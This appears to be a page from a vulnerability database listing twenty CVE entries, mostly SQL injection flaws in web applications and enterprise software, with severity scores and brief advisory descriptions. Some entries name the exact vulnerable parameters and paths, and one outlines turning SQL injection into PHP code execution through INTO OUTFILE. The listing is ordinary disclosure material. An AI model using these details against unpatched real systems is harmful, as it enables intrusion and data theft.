Total
9311 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2012-3350 | 1 Valarsoft | 1 Webmatic | 2018-05-29 | 6.8 MEDIUM | N/A |
| SQL injection vulnerability in index.php in Webmatic 3.1.1 allows remote attackers to execute arbitrary SQL commands via the Referer HTTP header. | |||||
| CVE-2018-9245 | 1 Ericssonlg | 1 Ipecs Nms | 2018-05-25 | 10.0 HIGH | 9.8 CRITICAL |
| The Ericsson-LG iPECS NMS A.1Ac login portal has a SQL injection vulnerability in the User ID and password fields that allows users to bypass the login page and execute remote code on the operating system. | |||||
| CVE-2018-9102 | 1 Mitel | 2 Mivoice Connect, St 14.2 | 2018-05-25 | 4.3 MEDIUM | 6.5 MEDIUM |
| A vulnerability in the conferencing component of Mitel MiVoice Connect, versions R1707-PREM SP1 (21.84.5535.0) and earlier, and Mitel ST 14.2, versions GA27 (19.49.5200.0) and earlier, could allow an unauthenticated attacker to conduct an SQL injection attack due to insufficient input validation for the signin interface. A successful exploit could allow an attacker to extract sensitive information from the database. | |||||
| CVE-2017-1722 | 1 Ibm | 1 Qradar Security Information And Event Manager | 2018-05-25 | 6.5 MEDIUM | 6.3 MEDIUM |
| IBM Security QRadar SIEM 7.2 and 7.3 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 134811. | |||||
| CVE-2017-17902 | 1 Kliqqi | 1 Kliqqi Cms | 2018-05-24 | 7.5 HIGH | 9.8 CRITICAL |
| SQL Injection exists in Kliqqi CMS 3.5.2 via the randkey parameter of a new story at the pligg/story.php?title= URI. | |||||
| CVE-2018-1292 | 1 Apache | 1 Fineract | 2018-05-22 | 5.5 MEDIUM | 8.1 HIGH |
| Within the 'getReportType' method in Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, a hacker could inject SQL to read/update data for which he doesn't have authorization for by way of the 'reportName' parameter. | |||||
| CVE-2018-1291 | 1 Apache | 1 Fineract | 2018-05-22 | 5.5 MEDIUM | 8.1 HIGH |
| Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating exposes different REST end points to query domain specific entities with a Query Parameter 'orderBy' which are appended directly with SQL statements. A hacker/user can inject/draft the 'orderBy' query parameter by way of the "order" param in such a way to read/update the data for which he doesn't have authorization. | |||||
| CVE-2018-1290 | 1 Apache | 1 Fineract | 2018-05-22 | 7.5 HIGH | 9.8 CRITICAL |
| In Apache Fineract versions 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, Using a single quotation escape with two continuous SQL parameters can cause a SQL injection. This could be done in Methods like retrieveAuditEntries of AuditsApiResource Class and retrieveCommands of MakercheckersApiResource Class. | |||||
| CVE-2018-1289 | 1 Apache | 1 Fineract | 2018-05-22 | 6.5 MEDIUM | 8.8 HIGH |
| In Apache Fineract versions 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, the system exposes different REST end points to query domain specific entities with a Query Parameter 'orderBy' and 'sortOrder' which are appended directly with SQL statements. A hacker/user can inject/draft the 'orderBy' and 'sortOrder' query parameter in such a way to read/update the data for which he doesn't have authorization. | |||||
| CVE-2018-8953 | 1 Ca | 1 Workload Automation Ae | 2018-05-17 | 6.5 MEDIUM | 8.8 HIGH |
| CA Workload Automation AE before r11.3.6 SP7 allows remote attackers to a perform SQL injection via a crafted HTTP request. | |||||
| CVE-2018-10225 | 1 Thinkphp | 1 Thinkphp | 2018-05-17 | 7.5 HIGH | 9.8 CRITICAL |
| thinkphp 3.1.3 has SQL Injection via the index.php s parameter. | |||||
| CVE-2018-0530 | 1 Cybozu | 1 Garoon | 2018-05-17 | 6.5 MEDIUM | 8.8 HIGH |
| SQL injection vulnerability in the Cybozu Garoon 3.5.0 to 4.2.6 allows remote authenticated attackers to execute arbitrary SQL commands via unspecified vectors. | |||||
| CVE-2017-9839 | 1 Dolibarr | 1 Dolibarr Erp\/crm | 2018-05-16 | 6.5 MEDIUM | 8.8 HIGH |
| Dolibarr ERP/CRM is affected by SQL injection in versions before 5.0.4 via product/stats/card.php (type parameter). | |||||
| CVE-2017-18260 | 1 Dolibarr | 1 Dolibarr Erp\/crm | 2018-05-16 | 6.5 MEDIUM | 8.8 HIGH |
| Dolibarr ERP/CRM is affected by multiple SQL injection vulnerabilities in versions through 7.0.0 via comm/propal/list.php (viewstatut parameter) or comm/propal/list.php (propal_statut parameter, aka search_statut parameter). | |||||
| CVE-2018-1282 | 1 Apache | 1 Hive | 2018-05-15 | 7.5 HIGH | 9.1 CRITICAL |
| This vulnerability in Apache Hive JDBC driver 0.7.1 to 2.3.2 allows carefully crafted arguments to be used to bypass the argument escaping/cleanup that JDBC driver does in PreparedStatement implementation. | |||||
| CVE-2018-9230 | 1 Openresty | 1 Openresty | 2018-05-15 | 7.5 HIGH | 9.8 CRITICAL |
| ** DISPUTED ** In OpenResty through 1.13.6.1, URI parameters are obtained using the ngx.req.get_uri_args and ngx.req.get_post_args functions that ignore parameters beyond the hundredth one, which might allow remote attackers to bypass intended access restrictions or interfere with certain Web Application Firewall (ngx_lua_waf or X-WAF) products. NOTE: the vendor has reported that 100 parameters is an intentional default setting, but is adjustable within the API. The vendor's position is that a security-relevant misuse of the API by a WAF product is a vulnerability in the WAF product, not a vulnerability in OpenResty. | |||||
| CVE-2018-9247 | 1 Gxlcms | 1 Gxlcms Qy | 2018-05-09 | 7.5 HIGH | 9.8 CRITICAL |
| The upsql function in \Lib\Lib\Action\Admin\DataAction.class.php in Gxlcms QY v1.0.0713 allows remote attackers to execute arbitrary SQL statements via the sql parameter. Consequently, an attacker can execute arbitrary PHP code by placing it after a <?php substring, and then using INTO OUTFILE with a .php filename. | |||||
| CVE-2018-10050 | 1 Iscripts | 1 Eswap | 2018-05-09 | 6.5 MEDIUM | 7.2 HIGH |
| iScripts eSwap v2.4 has SQL injection via the "registration_settings.php" ddlFree parameter in the Admin Panel. | |||||
| CVE-2016-1000118 | 1 Huge-it | 1 Slideshow | 2018-05-02 | 6.5 MEDIUM | 7.2 HIGH |
| XSS & SQLi in HugeIT slideshow v1.0.4 | |||||
| CVE-2016-1000119 | 1 Huge-it | 1 Catalog | 2018-05-02 | 6.5 MEDIUM | 7.2 HIGH |
| SQLi and XSS in Huge IT catalog extension v1.0.4 for Joomla | |||||